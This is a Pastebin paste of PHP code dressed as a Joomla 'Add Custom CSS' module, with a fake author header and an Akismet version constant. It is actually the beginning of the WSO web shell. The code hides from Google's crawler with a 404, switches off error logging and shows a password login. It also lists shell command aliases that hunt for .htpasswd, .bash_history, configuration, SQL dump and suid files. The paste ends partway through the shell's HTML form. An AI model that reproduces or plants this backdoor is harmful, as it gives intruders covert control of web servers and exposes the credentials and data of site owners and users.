Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <?php
- /*------------------------------------------------------------------------
- # mod_add_custom_css - Add Custom CSS
- # ------------------------------------------------------------------------
- # version 1.1.1
- # author Impression eStudio
- # copyright Copyright (C) 2012 Impression eStudio. All Rights Reserved.
- # @license - http://www.gnu.org/licenses/gpl-2.0.html GNU/GPL
- # Websites: http://joomla.impression-estudio.gr
- # Technical Support: [email protected]
- -------------------------------------------------------------------------*/
- define('AKISMET_VERSION', '2.2.6');
- $color = "#df5";
- $dflt_actn = 'FilesMan';
- @define('SELF_PATH', __FILE__);
- if( strpos($_SERVER['HTTP_USER_AGENT'],'Google') !== false ) {
- header('HTTP/1.0 404 Not Found');
- exit;
- }
- @session_start();
- @error_reporting(0);
- @ini_set('error_log',NULL);
- @ini_set('log_errors',0);
- @ini_set('max_execution_time',0);
- @set_time_limit(0);
- @set_magic_quotes_runtime(0);
- @define('VERSION', '2.2');
- if( get_magic_quotes_gpc() ) {
- function stripslashes_array($array) {
- return is_array($array) ? array_map('stripslashes_array', $array) : stripslashes($array);
- }
- $_POST = stripslashes_array($_POST);
- }
- function printLogin() {
- ?>
- <center>
- <form method=post>
- Password: <input type=password name=pass><input type=submit value='>>'>
- </form></center>
- <?php
- exit;
- }
- if( !isset( $_SESSION[md5($_SERVER['HTTP_HOST'])] ))
- if( empty( $auth_pass ) ||
- ( isset( $_POST['pass'] ) && ( md5($_POST['pass']) == $auth_pass ) ) )
- $_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
- else
- printLogin();
- if( strtolower( substr(PHP_OS,0,3) ) == "win" )
- $os = 'win';
- else
- $os = 'nix';
- $safe_mode = @ini_get('safe_mode');
- $disable_functions = @ini_get('disable_functions');
- $home_cwd = @getcwd();
- if( isset( $_POST['c'] ) )
- @chdir($_POST['c']);
- $cwd = @getcwd();
- if( $os == 'win') {
- $home_cwd = str_replace("\\", "/", $home_cwd);
- $cwd = str_replace("\\", "/", $cwd);
- }
- if( $cwd[strlen($cwd)-1] != '/' )
- $cwd .= '/';
- if($os == 'win')
- $aliases = array(
- "List Directory" => "dir",
- "Find index.php in current dir" => "dir /s /w /b index.php",
- "Find *config*.php in current dir" => "dir /s /w /b *config*.php",
- "Show active connections" => "netstat -an",
- "Show running services" => "net start",
- "User accounts" => "net user",
- "Show computers" => "net view",
- "ARP Table" => "arp -a",
- "IP Configuration" => "ipconfig /all"
- );
- else
- $aliases = array(
- "List dir" => "ls -la",
- "list file attributes on a Linux second extended file system" => "lsattr -va",
- "show opened ports" => "netstat -an | grep -i listen",
- "Find" => "",
- "find all suid files" => "find / -type f -perm -04000 -ls",
- "find suid files in current dir" => "find . -type f -perm -04000 -ls",
- "find all sgid files" => "find / -type f -perm -02000 -ls",
- "find sgid files in current dir" => "find . -type f -perm -02000 -ls",
- "find config.inc.php files" => "find / -type f -name config.inc.php",
- "find config* files" => "find / -type f -name \"config*\"",
- "find config* files in current dir" => "find . -type f -name \"config*\"",
- "find all writable folders and files" => "find / -perm -2 -ls",
- "find all writable folders and files in current dir" => "find . -perm -2 -ls",
- "find all service.pwd files" => "find / -type f -name service.pwd",
- "find service.pwd files in current dir" => "find . -type f -name service.pwd",
- "find all .htpasswd files" => "find / -type f -name .htpasswd",
- "find .htpasswd files in current dir" => "find . -type f -name .htpasswd",
- "find all .bash_history files" => "find / -type f -name .bash_history",
- "find .bash_history files in current dir" => "find . -type f -name .bash_history",
- "find all .fetchmailrc files" => "find / -type f -name .fetchmailrc",
- "find .fetchmailrc files in current dir" => "find . -type f -name .fetchmailrc",
- "Locate" => "",
- "locate httpd.conf files" => "locate httpd.conf",
- "locate vhosts.conf files" => "locate vhosts.conf",
- "locate proftpd.conf files" => "locate proftpd.conf",
- "locate psybnc.conf files" => "locate psybnc.conf",
- "locate my.conf files" => "locate my.conf",
- "locate admin.php files" =>"locate admin.php",
- "locate cfg.php files" => "locate cfg.php",
- "locate conf.php files" => "locate conf.php",
- "locate config.dat files" => "locate config.dat",
- "locate config.php files" => "locate config.php",
- "locate config.inc files" => "locate config.inc",
- "locate config.inc.php" => "locate config.inc.php",
- "locate config.default.php files" => "locate config.default.php",
- "locate config* files " => "locate config",
- "locate .conf files"=>"locate '.conf'",
- "locate .pwd files" => "locate '.pwd'",
- "locate .sql files" => "locate '.sql'",
- "locate .htpasswd files" => "locate '.htpasswd'",
- "locate .bash_history files" => "locate '.bash_history'",
- "locate .mysql_history files" => "locate '.mysql_history'",
- "locate .fetchmailrc files" => "locate '.fetchmailrc'",
- "locate backup files" => "locate backup",
- "locate dump files" => "locate dump",
- "locate priv files" => "locate priv"
- );
- function printHeader() {
- if(empty($_POST['charset']))
- $_POST['charset'] = "UTF-8";
- global $color;
- ?>
- <html><head><meta http-equiv='Content-Type' content='text/html; charset=<?php echo $_POST['charset']?>'><title><?php echo $_SERVER['HTTP_HOST']?> - WSO <?php echo VERSION?></title>
- <style>
- body{background-color:#444;color:#e1e1e1;}
- body,td,th{ font: 9pt Lucida,Verdana;margin:0;vertical-align:top;color:#e1e1e1; }
- table.info{ color:#fff;background-color:#222; }
- span,h1,a{ color:<?php echo $color?> !important; }
- span{ font-weight: bolder; }
- h1{ border-left:5px solid <?php echo $color?>;padding: 2px 5px;font: 14pt Verdana;background-color:#222;margin:0px; }
- div.content{ padding: 5px;margin-left:5px;background-color:#333; }
- a{ text-decoration:none; }
- a:hover{ text-decoration:underline; }
- .ml1{ border:1px solid #444;padding:5px;margin:0;overflow: auto; }
- .bigarea{ width:100%;height:250px; }
- input,textarea,select{ margin:0;color:#fff;background-color:#555;border:1px solid <?php echo $color?>; font: 9pt Monospace,"Courier New"; }
- form{ margin:0px; }
- #toolsTbl{ text-align:center; }
- .toolsInp{ width: 300px }
- .main th{text-align:left;background-color:#5e5e5e;}
- .main tr:hover{background-color:#5e5e5e}
- .l1{background-color:#444}
- pre{font-family:Courier,Monospace;}
- </style>
- <script>
- var c_ = '<?php echo htmlspecialchars($GLOBALS['cwd'])?>';
- var a_ = '<?php echo htmlspecialchars(@$_POST['a'])?>';
- var p1_ = '<?php echo (strpos(@$_POST['p1'],"\n")!==false)?'':addslashes(htmlspecialchars(@$_POST['p1']))?>';
- var p2_ = '<?php echo (strpos(@$_POST['p2'],"\n")!==false)?'':addslashes(htmlspecialchars(@$_POST['p2']))?>';
- var p3_ = '<?php echo (strpos(@$_POST['p3'],"\n")!==false)?'':addslashes(htmlspecialchars(@$_POST['p3']))?>';
- var charset_ = '<?php echo htmlspecialchars(@$_POST['charset'])?>';
- function set(a,c,p1,p2,p3,charset) {
- if(a != null)document.mf.a.value=a;else document.mf.a.value=a_;
- if(c != null)document.mf.c.value=c;else document.mf.c.value=c_;
- if(p1 != null)document.mf.p1.value=p1;else document.mf.p1.value=p1_;
- if(p2 != null)document.mf.p2.value=p2;else document.mf.p2.value=p2_;
- if(p3 != null)document.mf.p3.value=p3;else document.mf.p3.value=p3_;
- if(charset != null)document.mf.charset.value=charset;else document.mf.charset.value=charset_;
- }
- function g(a,c,p1,p2,p3,charset) {
- set(a,c,p1,p2,p3,charset);
- document.mf.submit();
- }
- function a(a,c,p1,p2,p3,charset) {
- set(a,c,p1,p2,p3,charset);
- var params = "ajax=true";
- for(i=0;i<document.mf.elements.length;i++)
- params += "&"+document.mf.elements[i].name+"="+encodeURIComponent(document.mf.elements[i].value);
- sr('<?php echo $_SERVER['REQUEST_URI'];?>', params);
- }
- function sr(url, params) {
- if (window.XMLHttpRequest) {
- req = new XMLHttpRequest();
- req.onreadystatechange = processReqChange;
- req.open("POST", url, true);
- req.setRequestHeader ("Content-Type", "application/x-www-form-urlencoded");
- req.send(params);
- }
- else if (window.ActiveXObject) {
- req = new ActiveXObject("Microsoft.XMLHTTP");
- if (req) {
- req.onreadystatechange = processReqChange;
- req.open("POST", url, true);
- req.setRequestHeader ("Content-Type", "application/x-www-form-urlencoded");
- req.send(params);
- }
- }
- }
- function processReqChange() {
- if( (req.readyState == 4) )
- if(req.status == 200) {
- var reg = new RegExp("(\\d+)([\\S\\s]*)", "m");
- var arr=reg.exec(req.responseText);
- eval(arr[2].substr(0, arr[1]));
- }
- else alert("Request error!");
- }
- </script>
- <head><body><div style="position:absolute;width:100%;background-color:#444;top:0;left:0;">
- <form method=post name=mf style='display:none;'>
- <input type=hidden name=a>
- <input type=hidden name=c>
- <input type=hidden name=p1>
- <input type=hidden name=p2>
- <input type=hidden name=p3>
- <input type=hidden name=charset>
- </form>
Advertisement
Add Comment
Please, Sign In to add comment